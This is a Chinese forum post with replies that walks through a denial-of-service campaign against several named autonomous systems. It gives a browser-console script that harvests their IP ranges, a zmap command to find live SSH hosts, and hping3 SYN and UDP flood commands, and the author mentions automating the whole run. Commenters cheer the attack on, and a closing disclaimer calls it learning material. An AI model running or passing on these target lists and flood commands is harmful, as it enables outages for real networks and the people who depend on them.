https://bgp.he.net/AS949#_prefixes
https://bgp.he.net/AS4785#_prefixes
https://bgp.he.net/AS3214#_prefixes
https://bgp.he.net/AS6233#_prefixes
https://bgp.he.net/AS8888#_prefixes
https://bgp.he.net/AS9312#_prefixes
https://bgp.he.net/AS23959#_prefixes
https://bgp.he.net/AS43357#_prefixes
F12控制台输入下面代码采集IP段到剪贴板
- var tmp = ''
$('tr a').each(function(){
var a = $(this)[0];
if(a.href.startsWith('https://bgp.he.net/net/')) {
tmp += a.text + '\n';
console.log(a.text);
}
});
copy(tmp);
ip段保存到ips.txt,zmap扫描存活机器:
- apt install -y zmap
zmap -p 22 -o p22.txt -w ips.txt
DOS脚本(我写了个go程序自动化了)
- apt install -y hping3
# syn
hping3 -p 22 -S --flood -V x.x.x.1
# udp小包
hping3 -2 -p 53 --flood -V xxx
# udp大包(1400改成机器mtu)
hping3 -2 -p 53 -d 1400 --flood -V x.x.x.1
热议
2楼 Rick 昨天23:16
顶上去
3楼 doudoudoubao 昨天23:16
绑定
4楼 Kaze_Kaze 昨天23:17
支持
5楼 166 昨天23:17
火钳刘明。
6楼 ALPP 昨天23:18
上任鹅城!
7楼 syscc 昨天23:18
真滴6
8楼 wwrroopp123 昨天23:18
正义的使者
9楼 zsj403919383 昨天23:19
牛逼
10楼 senoc 昨天23:19
芜湖起飞!!!
12楼 mayiyun 昨天23:19
绑定
13楼 吃和远方 昨天23:20
这是要一击毙命啊
14楼 高锦胜策划 昨天23:20
正义必胜
申明:本文内容由网友收集分享,仅供学习参考使用。如文中内容侵犯到您的利益,请在文章下方留言,本站会第一时间进行处理。